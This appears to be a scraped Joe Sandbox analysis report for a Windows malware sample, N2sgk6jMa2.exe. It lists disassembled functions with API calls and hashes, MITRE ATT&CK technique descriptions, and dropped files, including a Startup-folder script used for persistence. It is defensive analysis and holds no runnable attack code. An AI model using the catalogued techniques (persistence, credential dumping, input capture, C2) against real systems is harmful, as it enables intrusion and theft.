Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 285b1517475d2e4dc3e186eb451a24d3ac6e67c31627d224b533d87de508204f
Instruction ID: 09109b7675433f607b90fcbc81f637492ec1c61c5bbe75e681f06173dde4f946
Opcode Fuzzy Hash: 285b1517475d2e4dc3e186eb451a24d3ac6e67c31627d224b533d87de508204f
Instruction Fuzzy Hash: F701F271A81208BBCF00EBA4C892EFFB7ACDF05301F640119BD06632C2DA21AE0C8675

Function 00D651CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00D651E8
_wcscmp.LIBCMT ref: 00D651FA

Strings

#32770, xrefs: 00D651F4

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 660e48e66995f676875ccd8a31ce240c1bf5889571a6cf63b347ca769734a96d
Instruction ID: 43df468e0a08d960d257b8f473ee7b2d48e7cd52c50abb0c5b54a034873cc0d5
Opcode Fuzzy Hash: 660e48e66995f676875ccd8a31ce240c1bf5889571a6cf63b347ca769734a96d
Instruction Fuzzy Hash: 64E06832A0032D2BE7209B99AC0AFA7F7ACEB54731F00016BFD10D3140E5609A448BF0

Function 00D581BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00D581CA

Part of subcall function 00D23598: _doexit.LIBCMT ref: 00D235A2

Strings

Error allocating memory., xrefs: 00D581C3
AutoIt, xrefs: 00D581BE

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 7fbc863db16675f089ef0a6b3d43cb4aa83670b8fc05cd345ec7b0033b8cf1a7
Instruction ID: 043037977203573c54a594f3fd850f237797be2915e3348e3889cbe1064de01c
Opcode Fuzzy Hash: 7fbc863db16675f089ef0a6b3d43cb4aa83670b8fc05cd345ec7b0033b8cf1a7
Instruction Fuzzy Hash: 34D0C23628436836D21032A46D07FC566488B14B16F004021BB08A51C389D5448142F8

Function 00D3B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00D3B564: _memset.LIBCMT ref: 00D3B571

Part of subcall function 00D20B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D3B540,?,?,?,00D0100A), ref: 00D20B89

IsDebuggerPresent.KERNEL32(?,?,?,00D0100A), ref: 00D3B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D0100A), ref: 00D3B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D3B54E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 8335728106e22d5f7f9c2b6ba8b390fa920714334faaa931b4aad156f171d5f9
Instruction ID: 02da9e2bc0f782ad1fa5c54b9a223d3b9b45f60d4a6d2ec00f0a958e1fbf9d09
Opcode Fuzzy Hash: 8335728106e22d5f7f9c2b6ba8b390fa920714334faaa931b4aad156f171d5f9
Instruction Fuzzy Hash: 4BE065B02003118FD720DF69E804742BBE0AB10728F04892EE986C23A1EBB4E548CBB1

Function 00D85BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D85BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00D85C08

Part of subcall function 00D654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D6555E

Strings

Shell_TrayWnd, xrefs: 00D85BEE

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 264a094da732a4a7a4992cc3ec1b357aa9e41eb3d6c2c3822daed1b0cd04166f
Instruction ID: 77a520d4e3c57828c3fd1bb4eafcb4e5d228ff657a1e51136ef7d6c05a45aa42
Opcode Fuzzy Hash: 264a094da732a4a7a4992cc3ec1b357aa9e41eb3d6c2c3822daed1b0cd04166f
Instruction Fuzzy Hash: CBD0C931398311BBE764AB74AC0BFE76A14AB00B51F000865B746EA2D0D9E46841C770

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report N2sgk6jMa2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\Marquand

C:\Users\user\AppData\Local\Temp\autEC29.tmp

C:\Users\user\AppData\Local\Temp\autEC58.tmp

C:\Users\user\AppData\Local\Temp\autEF65.tmp

C:\Users\user\AppData\Local\Temp\autEF95.tmp

C:\Users\user\AppData\Local\Temp\prophetesses

C:\Users\user\AppData\Local\directory\.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.vbs

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
N2sgk6jMa2.exe

Function 00D03B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00D04AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00D04FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00D693DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00D03015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00D03041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00D071EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00D03A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00D03633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre